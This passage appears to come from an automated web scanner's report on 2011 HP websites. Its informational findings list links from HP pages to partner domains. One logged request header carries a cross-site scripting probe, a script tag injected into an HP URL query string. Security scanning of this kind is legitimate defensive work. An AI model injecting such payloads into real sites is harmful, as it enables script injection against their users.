<a href="javascript:void(0)" class="story_link" onfocus="blur()"><img id="storyTile10" class="stories_tiles_tile" src="http://hpstaging1.i.feedroom.com/t_assets/hpstaging1/20110218/fe05d4367d18c8de3c3fdf6c26e6fa4ef7bbaee5.jpg" alt="DreamWorks Animation" title="DreamWorks Animation" onerror='this.src="http://hpgateway.i.feedroom.com/affiliate/_common/ti_static.gif?ver=2011030401"'/></a>
...[SNIP]...
<a href="javascript:void(0)" class="story_link" onfocus="blur()"><img id="storyTile11" class="stories_tiles_tile" src="http://hpcorp.i.feedroom.com/t_assets/hpcorp/20100514/8c6e0055a5ba8e81918f1acc5c51376e5ecde38b.jpg" alt="Together, we can make a difference" title="Together, we can make a difference" onerror='this.src="http://hpgateway.i.feedroom.com/affiliate/_common/ti_static.gif?ver=2011030401"'/></a>
...[SNIP]...

9.8. http://h30415.www3.hp.com/components.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h30415.www3.hp.com
Path:	/components.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://h30415.www3.hp.com/components.jsp?&nsid=a-4d123106:130e2c22257:1896

The response contains the following links to other domains:

http://hpcorp.feedroom.com/
http://hpgateway.feedroom.com/
http://hpgateway.i.feedroom.com/affiliate/_common/spacer.gif?ver=2011030401
http://hpgateway.i.feedroom.com/affiliate/hpgateway/frhp/bt_header_corporate.gif?ver=2011030401
http://hpgateway.i.feedroom.com/affiliate/hpgateway/frhp/bt_header_enterprise.gif?ver=2011030401
http://hpgateway.i.feedroom.com/affiliate/hpgateway/frhp/bt_header_home.gif?ver=2011030401
http://hpgateway.i.feedroom.com/affiliate/hpgateway/frhp/bt_header_howto.gif?ver=2011030401
http://hpgateway.i.feedroom.com/affiliate/hpgateway/frhp/bt_header_products.gif?ver=2011030401
http://hphowto.feedroom.com/
http://hpproserv.feedroom.com/
http://hptv.feedroom.com/

Request

GET /components.jsp?&nsid=a-4d123106:130e2c22257:1896 HTTP/1.1
Host: h30415.www3.hp.com
Proxy-Connection: keep-alive
Referer: http://h30415.www3.hp.com/index.jsp?78db3%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ec7cb7310b63=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcompc_usen=cartExists=false; hp_cust_seg_sel=HHO; jumpstack=%5B%5B'ex_r329_us%2Fen%2Fany%2Fpsg%2Fnimble_msn-ot-li_chev%2Fhp_accessories_ql'%2C'1309434425265'%5D%5D; EMID=; hpjidc=37; bn_u=6923614956829433945; s_vi=[CS]v1|2706312D0501146A-60000108C016BD51[CE]; bnTrail=%5B%22http%3A%2F%2Fwww8.hp.com%2Fus%2Fen%2Fhome.html%3Fjumpid%3Dex_r163_us%2Fen%2Fany%2Fpsg%2Fnimble_msn-ot-li_chev%2Fhp_promos_ql%22%5D; lang=en-us; cc=us; ARPT=XVIOVMS10.100.129.40CKMWJ; fr_puid=063011_091735485_w4d123106x130e2c22257x1897; frC=1; JSESSIONID=abcXE0gs2UGqA6THBrJdt; prop12=r11469; s_depth=1; s_cc=true; s_sq=%5B%5BB%5D%5D; HP_EBUS_HP_CLICKS=1x1x5

Response

HTTP/1.1 200 OK
Date: Fri, 01 Jul 2011 01:19:13 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Expires: Mon, 06 Jan 1974 00:00:01 GMT
Cache-Control: no-store, no-cache, private, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref='/w3c/p3p.xml', CP='NOI NID OUR NOR UNI'
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding,User-Agent
Content-Length: 5356

<iframe src='http://h30415.www3.hp.com/empty.html?ifrAction' name="ifr_actionBox" id="ifr_actionBox" marginheight=0 marginwidth=0 topmargin=0 leftmargin=0 frameborder=0 allowtransparency="true" ><
...[SNIP]...
<td><a href="http://hpgateway.feedroom.com" title="HP Videos" alt="HP Videos"><img src="http://hpgateway.i.feedroom.com/affiliate/hpgateway/frhp/bt_header_home.gif?ver=2011030401"></a></td>
<td><a href="http://hpcorp.feedroom.com" title="HP Corporate TV: Videos and Podcasts" alt="HP Corporate TV: Videos and Podcasts"><img src="http://hpgateway.i.feedroom.com/affiliate/hpgateway/frhp/bt_header_corporate.gif?ver=2011030401"></a></td>
<td><a href="http://hptv.feedroom.com" title="HP Enterprise TV: Online Videos and Podcasts" alt="HP Enterprise TV: Online Videos and Podcasts"><img src="http://hpgateway.i.feedroom.com/affiliate/hpgateway/frhp/bt_header_enterprise.gif?ver=2011030401"></a></td>
<td><a href="http://hpproserv.feedroom.com" title="HP Products & Services: Videos & Podcasts" alt="HP Products & Services: Videos & Podcasts" border="0"><img src="http://hpgateway.i.feedroom.com/affiliate/hpgateway/frhp/bt_header_products.gif?ver=2011030401"></a></td>
<td><a href="http://hphowto.feedroom.com" title="HP Total Care Support: Videos and Podcasts" alt="HP Total Care Support: Videos and Podcasts" border="0"><img src="http://hpgateway.i.feedroom.com/affiliate/hpgateway/frhp/bt_header_howto.gif?ver=2011030401"></a>
...[SNIP]...
<div id="divHelp">

<img src="http://hpgateway.i.feedroom.com/affiliate/_common/spacer.gif?ver=2011030401" class="help_left">

<a href="javascript:void(0);" onClick="winPopup('http://h30415.www3.hp.com/faq/index.jsp?nsid=a-4d123106:130e2c22257:1896','faq',610,550,0,0,0,1,false);return false;" onfocus="this.blur()" onmouseOver="javascript:rolloverImage('helpImg','help_on');" onmouseOut="javascript:rolloverImage('helpImg','help_off');">
<img class="help_off" id="helpImg" name="helpImg" title="Video Help" src="http://hpgateway.i.feedroom.com/affiliate/_common/spacer.gif?ver=2011030401" border="0"></a>
<img src="http://hpgateway.i.feedroom.com/affiliate/_common/spacer.gif?ver=2011030401" class="help_right">
</div>
...[SNIP]...
<a href="javascript:void(0)" onClick="winPopup('http://www.feedroom.com','feedroom',800,730,1,1,1,1,false);return false;" onfocus="this.blur()"><img class="powered" src="http://hpgateway.i.feedroom.com/affiliate/_common/spacer.gif?ver=2011030401" border="0" onmouseover="replaceImage(this, this.className)"></a>
...[SNIP]...
<a href="" target="_blank"><img src="http://hpgateway.i.feedroom.com/affiliate/_common/spacer.gif?ver=2011030401" border="0px" class="footerImage" ></a>
...[SNIP]...
<a href="javascript:void(0)" onClick="winPopup('http://public-xml.feedroom.com/public_rss/hpgateway_feeds.html','feedroom',800,730,1,1,1,1,false);return false;" onfocus="this.blur()" ><img class="rss" src="http://hpgateway.i.feedroom.com/affiliate/_common/spacer.gif?ver=2011030401" border="0"></a>
...[SNIP]...

9.9. http://h30428.www3.hp.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h30428.www3.hp.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://h30428.www3.hp.com/?fr_story=bc92dc55eae06cf92781703fcc0a2b3ff5c3e53d&rf=bm&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-see_touch_9361/

The response contains the following link to another domain:

http://hpproserv.feedroom.com/?fr_story=bc92dc55eae06cf92781703fcc0a2b3ff5c3e53d&rf=bm&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-see_touch_9361/

Request

GET /?fr_story=bc92dc55eae06cf92781703fcc0a2b3ff5c3e53d&rf=bm&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-see_touch_9361/ HTTP/1.1
Host: h30428.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Set-Cookie: ARPT=XVIOVMS10.100.129.40CKMWJ; path=/
Date: Thu, 30 Jun 2011 11:50:10 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Expires: Mon, 06 Jan 1974 00:00:01 GMT
Cache-Control: no-store, no-cache, private, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref='/w3c/p3p.xml', CP='NOI NID OUR NOR UNI'
Location: http://hpproserv.feedroom.com?fr_story=bc92dc55eae06cf92781703fcc0a2b3ff5c3e53d&rf=bm&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-see_touch_9361/
Content-Length: 219
Set-Cookie: JSESSIONID=abcUS4J7ztB--6ZjOyGdt; path=/
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding,User-Agent
Connection: close

The URL has moved <a href="http://hpproserv.feedroom.com?fr_story=bc92dc55eae06cf92781703fcc0a2b3ff5c3e53d&rf=bm&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-see_touch_9361/">here</a>
...[SNIP]...

9.10. http://h41112.www4.hp.com/price_cat_rss/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h41112.www4.hp.com
Path:	/price_cat_rss/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://h41112.www4.hp.com/price_cat_rss/index.php?cc=us&ll=en&segment=slot23&showcat=Games&jumpid=ex_r602_us/en/any/psg/nimble_msn-ot-li_chev/hp_games_ql

The response contains the following links to other domains:

http://hp.wildgames.com/console?dp=hpdesktop&mc=hpdesktop_pcos_leftnav_dec2010&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_now__9359/
http://hp.wildgames.com/wildclub?dp=hpdesktop&mc=hpdesktop_pcos_feature_dec2010&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-get_more_p_9360/
http://welcome.hp-ww.com/country/us/en/js/metricsNAhhomktg.js
http://welcome.hp-ww.com/js/hpweb_soctag.js
http://www.hp.az/
http://www.hp.is/
http://www.hp.ma/
http://www.hp.md/
http://www.snapfish.com/hp_us_hpcomleftnavphotoprintserv_0709
http://www.wildtangent.com/Channels/touchfriendly?hp=hpdesktop&mc=hpdesktop_hpplus_touchfriendly_may2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-touch_the_9432/
http://www.wildtangent.com/Games/agriculturalsimulator2011?dp=hpdesktop&mc=hp_pcos_agriculturalsimulator2011_may2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-think_you_11388/
http://www.wildtangent.com/Games/amazingadventuresdynasty?dp=hpdesktop&mc=hp_consumerna_amazingadventuresdynasty_jun2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_the_n_11812/
http://www.wildtangent.com/Games/farmscapes?dp=hpdesktop&mc=hp_pcos_farmscapes_may2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-clucking_c_11386/
http://www.wildtangent.com/Games/fatethecursedking?dp=hpdesktop&mc=hp_pcos_fatethecursedking_may2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-like_rpgs__11384/
http://www.wildtangent.com/Games/lettersfromnowhere2?dp=hpdesktop&mc=hp_consumerna_lettersfromnowhere2_jun2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_lette_11814/
http://www.wildtangent.com/Games/phantasmat?dp=hpdesktop&mc=hp_pcos_phantasmat_may2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_the_s_11387/
http://www.wildtangent.com/Games/shrekforeverafter?dp=hpdesktop&mc=hp_consumerna_shrekforeverafter_jun2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-shrek_fore_11813/
http://www.wildtangent.com/GamesApp?dp=hpdesktop&mc=hp_pcos_gamesapp_apr2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-upgrade_to_11239/
http://www.wildtangent.com/WildCoins?dp=hpdesktop&mc=hp_pcos_wildcoins_apr2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_all_y_11240/
http://www.wildtangent.com/WildCoins?dp=hpdesktop&mc=hp_pcos_wildcoins_apr2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_all_y_11458/
http://www1.snapfish.com/welcomenpnu

Request

GET /price_cat_rss/index.php?cc=us&ll=en&segment=slot23&showcat=Games&jumpid=ex_r602_us/en/any/psg/nimble_msn-ot-li_chev/hp_games_ql HTTP/1.1
Host: h41112.www4.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 11:46:38 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8d
Last-Modified: Thu, 30 Jun 2011 08:00:15 GMT
Content-Type: text/html
Content-Length: 104378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us">
<head>

<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/js/hpweb_soctag.js"></script>
...[SNIP]...
<li>
<a class="hho" href="http://www.snapfish.com/hp_us_hpcomleftnavphotoprintserv_0709" name="us_en_home_hho-product_l14_hho_fixed_photo-printing-services" onclick="try{trackMetrics('linkClick',{type:'link', id:this.getAttribute('name')});} catch(err) {}" tabindex="2">Photo Printing Services</a>
...[SNIP]...
<li>
<a class="hho" href="http://www1.snapfish.com/welcomenpnu" name="us_en_home_hho-at-home_l3_hho_fixed_share-and-print-photos-online" onclick="try{trackMetrics('linkClick',{type:'link', id:this.getAttribute('name')});} catch(err) {}" tabindex="3">Share & print photos online</a>
...[SNIP]...
<div class="arrow-blue png"><a href="http://hp.wildgames.com/console?dp=hpdesktop&mc=hpdesktop_pcos_leftnav_dec2010&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_now__9359/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Gms : Play Now! Download the HP Games Console'; sendAnalyticsEvent('',s_pageName);" class="article-category png" target="_blank">Play Now! Download the HP Games Console</a>
...[SNIP]...
<div class="arrow-blue png"><a href="http://hp.wildgames.com/wildclub?dp=hpdesktop&mc=hpdesktop_pcos_feature_dec2010&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-get_more_p_9360/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Gms : Get More Play Time: Get HP Game WildCoins'; sendAnalyticsEvent('',s_pageName);" class="article-category png" target="_blank">Get More Play Time: Get HP Game WildCoins</a>
...[SNIP]...
<div class="arrow-blue png"><a href="http://www.wildtangent.com/Channels/touchfriendly?hp=hpdesktop&mc=hpdesktop_hpplus_touchfriendly_may2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-touch_the_9432/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Gms : Touch the future with touch games'; sendAnalyticsEvent('',s_pageName);" class="article-category png" target="_blank">Touch the future with touch games</a>
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.wildtangent.com/Games/shrekforeverafter?dp=hpdesktop&mc=hp_consumerna_shrekforeverafter_jun2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-shrek_fore_11813/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Shrek Forever After'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.wildtangent.com/Games/shrekforeverafter?dp=hpdesktop&mc=hp_consumerna_shrekforeverafter_jun2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-shrek_fore_11813/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Shrek Forever After'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.wildtangent.com/WildCoins?dp=hpdesktop&mc=hp_pcos_wildcoins_apr2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_all_y_11458/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Play all your favorite games 3 different ways!'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.wildtangent.com/WildCoins?dp=hpdesktop&mc=hp_pcos_wildcoins_apr2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_all_y_11458/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Play all your favorite games 3 different ways!'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.wildtangent.com/GamesApp?dp=hpdesktop&mc=hp_pcos_gamesapp_apr2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-upgrade_to_11239/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Upgrade to the NEW Games App!'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.wildtangent.com/GamesApp?dp=hpdesktop&mc=hp_pcos_gamesapp_apr2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-upgrade_to_11239/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Upgrade to the NEW Games App!'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.wildtangent.com/Games/amazingadventuresdynasty?dp=hpdesktop&mc=hp_consumerna_amazingadventuresdynasty_jun2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_the_n_11812/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Play The NEW Amazing Adventures!'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.wildtangent.com/Games/amazingadventuresdynasty?dp=hpdesktop&mc=hp_consumerna_amazingadventuresdynasty_jun2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_the_n_11812/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Play The NEW Amazing Adventures!'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.wildtangent.com/Games/lettersfromnowhere2?dp=hpdesktop&mc=hp_consumerna_lettersfromnowhere2_jun2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_lette_11814/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Play Letters from Nowhere 2!'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.wildtangent.com/Games/lettersfromnowhere2?dp=hpdesktop&mc=hp_consumerna_lettersfromnowhere2_jun2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_lette_11814/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Play Letters from Nowhere 2!'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.wildtangent.com/Games/fatethecursedking?dp=hpdesktop&mc=hp_pcos_fatethecursedking_may2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-like_rpgs__11384/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Like RPGs? Try the epic FATE: The Cursed King!'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.wildtangent.com/Games/fatethecursedking?dp=hpdesktop&mc=hp_pcos_fatethecursedking_may2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-like_rpgs__11384/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Like RPGs? Try the epic FATE: The Cursed King!'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.wildtangent.com/WildCoins?dp=hpdesktop&mc=hp_pcos_wildcoins_apr2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_all_y_11240/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Play all your favorite games 3 different ways!'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.wildtangent.com/WildCoins?dp=hpdesktop&mc=hp_pcos_wildcoins_apr2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_all_y_11240/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Play all your favorite games 3 different ways!'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.wildtangent.com/Games/farmscapes?dp=hpdesktop&mc=hp_pcos_farmscapes_may2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-clucking_c_11386/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Clucking chickens, mooing cows, and buzzing beehives!'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.wildtangent.com/Games/farmscapes?dp=hpdesktop&mc=hp_pcos_farmscapes_may2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-clucking_c_11386/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Clucking chickens, mooing cows, and buzzing beehives!'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.wildtangent.com/Games/phantasmat?dp=hpdesktop&mc=hp_pcos_phantasmat_may2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_the_s_11387/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Play the spooky Phantasmatnow!'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.wildtangent.com/Games/phantasmat?dp=hpdesktop&mc=hp_pcos_phantasmat_may2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_the_s_11387/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Play the spooky Phantasmatnow!'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
</span>        <a target="_blank" "cta" href="http://www.wildtangent.com/Games/agriculturalsimulator2011?dp=hpdesktop&mc=hp_pcos_agriculturalsimulator2011_may2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-think_you_11388/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Think you could run a REAL farm? Find out!'; sendAnalyticsEvent('',s_pageName);">            <div class="prodImg" style="margin:0 0 15px 0 !important; padding:0 !important; height: 150px; width: 180px; clear:both; ">
...[SNIP]...
</p>        <a target="_blank" "cta" href="http://www.wildtangent.com/Games/agriculturalsimulator2011?dp=hpdesktop&mc=hp_pcos_agriculturalsimulator2011_may2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-think_you_11388/" onclick="javascript:s_pageName=s_pageNameSave+' : ext : Games : Think you could run a REAL farm? Find out!'; sendAnalyticsEvent('',s_pageName);">            <div class="button-left png">
...[SNIP]...
<br />
<a class="link_metrics" href="http://www.hp.az" name="us_en_home_country-selector_l4_corp_fixed_azerbaijan" tabindex="180" title="Az..rbaycan">Az..rbaycan</a>
...[SNIP]...
<br />
<a class="link_metrics" href="http://www.hp.is" name="us_en_home_country-selector_l19_corp_fixed_iceland" tabindex="180" title="Iceland">Iceland</a>
...[SNIP]...
<br />
<a class="link_metrics" href="http://www.hp.ma" name="us_en_home_country-selector_l34_corp_fixed_morocco" tabindex="180" title="Maroc">Maroc</a>
...[SNIP]...
<br />
<a class="link_metrics" href="http://www.hp.md" name="us_en_home_country-selector_l37_corp_fixed_moldova" tabindex="180" title="Moldova">Moldova</a>
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/country/us/en/js/metricsNAhhomktg.js"></script>
...[SNIP]...

9.11. http://h41112.www4.hp.com/price_cat_rss/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h41112.www4.hp.com
Path:	/price_cat_rss/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://h41112.www4.hp.com/price_cat_rss/index.php?cc=us&ll=en&segment=slot23

The response contains the following links to other domains:

http://direct.digitallanding.com/default.aspx?PromoID=5001085&option1=pcos&option2=bus1&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-comcast_xf_10733/
http://hp.barnesandnoble.com/psgweb?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-read_what_10717/
http://hp.blio.com/?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-summer_rea_10730/
http://hp.wildgames.com/console?dp=hpdesktop&mc=hpdesktop_pcos_leftnav_dec2010&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-play_now__9359/
http://us.yola.com/hp/silver20PCOffers_feb/en_US?hardware=promotion&promo=HP_silver20PCOffers_FEB&reqloc=en_US&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-20_off_yo_9934/
http://welcome.hp-ww.com/country/us/en/js/metricsNAhhomktg.js
http://welcome.hp-ww.com/js/hpweb_soctag.js
http://www.hp.az/
http://www.hp.is/
http://www.hp.ma/
http://www.hp.md/
http://www.huddle.com/hp?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-manage_pro_10345/
http://www.kobobooks.com/hp?utm_source=hp&utm_medium=partner&utm_campaign=hp&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-cheap_read_11245/
http://www.norton.com/buportal/hppcos/dt?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-try_norton_11392/
http://www.norton.com/hppcos/dt/phishingpromo2011?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-what_is_sp_11385/
http://www.norton.com/hppcos/dt/phishingpromo2011?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-what_is_sp_11391/
http://www.nutsie.com/top100sradio/Top%20100%20Songs%20For%20Summer/13659081?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-top_100_so_9947/
http://www.quickbooksdirect.com/psg5?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-save_time_10334/
http://www.snapfish.com/hp_psg_freeship_2011?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-free_shipp_11242/
http://www.snapfish.com/hp_us_hpcomleftnavphotoprintserv_0709
http://www.wildtangent.com/Games/shrekforeverafter?dp=hpdesktop&mc=hp_consumerna_shrekforeverafter_jun2011&jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-shrek_fore_11813/
